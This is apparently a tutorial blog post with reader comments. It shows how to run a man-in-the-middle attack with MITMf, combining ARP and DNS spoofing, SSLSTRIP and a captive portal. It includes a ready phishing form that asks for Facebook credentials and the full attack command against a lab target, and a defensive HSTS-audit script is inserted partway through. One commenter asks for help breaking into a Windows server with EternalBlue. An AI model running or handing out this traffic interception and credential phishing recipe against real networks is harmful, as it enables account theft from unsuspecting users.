Using MITMF with SSLSTRIP and Captive Portal options
In this video we will try out a variation of the man-in-the-middle with SSLSTRIP attack that we performed previously.
In MITMF, in addition to ARP spoofing and SSLSTRIP, we will also be using the Captive Portal option.
Please review the videos listed below, if needed:
Bettercap with SSLSTRIP attack - Does it still work ?
SSLSTRIP attacks with Bettercap and MITMF - HSTS and Web browsers
We saw in the previous videos that websites correctly configured for HSTS can't be attacked using SSLSTRIP. On the other hand, at this moment, a lot of websites still don't use HSTS or have HSTS incorrectly configured, which leaves those websites vulnerable to man-in-the-middle and SSLSTRIP attacks.
Because it is unlikely for a user to browse ONLY correctly configured HSTS websites, an attacker can redirect the SSLSTRIP-vulnerable websites to a Captive Portal and trick the user into giving up credentials belonging to websites that can't be attacked directly (for example: social media credentials, email credentials, etc.).
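Whether a site falls into the "no HSTS or incorrectly configured HSTS" group can be checked from the defender's side. The Python below is an added example, not part of the original post: it audits a response's Strict-Transport-Security header against the RFC 6797 processing rules. The 180-day threshold and the sample responses are assumptions constructed for illustration.

```python
# Added example (not from the original post): audit an HSTS response header.
MIN_MAX_AGE = 15552000  # assumption: 180 days counts as "long enough"

def parse_hsts(value):
    """Return (directives, error). Directive names are case-insensitive."""
    directives = {}
    for part in value.split(";"):
        name, _, arg = part.strip().partition("=")
        name = name.strip().lower()
        if not name:
            continue
        if name in directives:  # RFC 6797: a directive may appear only once
            return None, "duplicate directive: " + name
        directives[name] = arg.strip().strip('"')
    return directives, None

def audit_hsts(scheme, headers):
    """headers: list of (name, value) from one response. Returns a list of findings."""
    values = [v for n, v in headers if n.lower() == "strict-transport-security"]
    if not values:
        return ["no HSTS header: HTTP requests to this host can be downgraded"]
    if scheme != "https":
        return ["HSTS sent over plain HTTP: browsers ignore it"]
    directives, err = parse_hsts(values[0])  # only the first header is processed
    if err:
        return ["invalid header (" + err + "): policy ignored"]
    max_age = directives.get("max-age", "")
    if not max_age.isdecimal():
        return ["max-age missing or not a number: policy ignored"]
    findings = []
    if int(max_age) == 0:
        findings.append("max-age=0: tells the browser to forget the HSTS policy")
    elif int(max_age) < MIN_MAX_AGE:
        findings.append("max-age below threshold: policy expires quickly")
    if "includesubdomains" not in directives:
        findings.append("includeSubDomains missing: subdomains are not covered")
    return findings

if __name__ == "__main__":
    # Constructed sample responses, not captured traffic.
    samples = [
        ("https", [("Strict-Transport-Security", "max-age=31536000; includeSubDomains")]),
        ("https", [("Strict-Transport-Security", "max-age=300")]),
        ("http", [("Strict-Transport-Security", "max-age=31536000")]),
        ("https", [("Content-Type", "text/html")]),
    ]
    for scheme, headers in samples:
        print(scheme, headers, "->", audit_hsts(scheme, headers) or "OK")
```

An empty findings list means the header passes these checks; it does not cover the very first visit to a host, which HSTS only protects when the host is on a browser preload list.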
Captive Portal
The test Captive Portal in the video is a very basic one which uses two files under the /var/www/html/form1 directory: index.html and welcome.php
index.html
<form action="welcome.php" method="post">
Please logon using your Facebook credentials in order to continue using our network:<br>
User: <input type="text" name="user"><br>
Password: <input type="text" name="pass"><br>
<input type="submit">
</form>
welcome.php
<html><body>
Enjoy tour browsing!
</body>
</html>
In a real scenario, an attacker would make the Captive Portal webpage fancier and more convincing.
MITMF
MITMF can be installed from the Kali Linux repository, but in order to use the Captive Portal option, MITMF has to be installed from GitHub, from the following location: https://github.com/byt3bl33d3r/MITMf
The following MITMF command was used to initiate the man-in-the-middle attack using ARP spoofing, SSLSTRIP and Captive Portal options:
./mitmf.py -i eth0 --hsts --spoof --arp --dns --gateway 192.168.254.2 --targets 192.168.254.70 --captive --portalurl http://192.168.254.176/form1
please help, error " python mitmf.py
:0: UserWarning: You do not have a working installation of the service_identity module: 'cannot import name opentype'. Please install it from and make sure all of its dependencies are satisfied. Without the service_identity module, Twisted can perform only rudimentary TLS client hostname verification. Many valid certificate/hostname mappings may be rejected.
Traceback (most recent call last):
File "mitmf.py", line 36, in
from plugins import *
File "/root/programas/MITMf/plugins/filepwn.py", line 72, in
from libs.bdfactory import pebin
ImportError: No module named bdfactory "
solved
Looks like you didn't install all the prerequisites ... ?
How did you solve it? I have the same issue.
Thanks Dude <3
subscribed
Thank you my friend :-)
Hi, how're doing?... Well I have a problem hacking into a windows server 2012 R2... I'm using eternalblue. Plz show me how to do it
my mitmf is not showing any captured traffic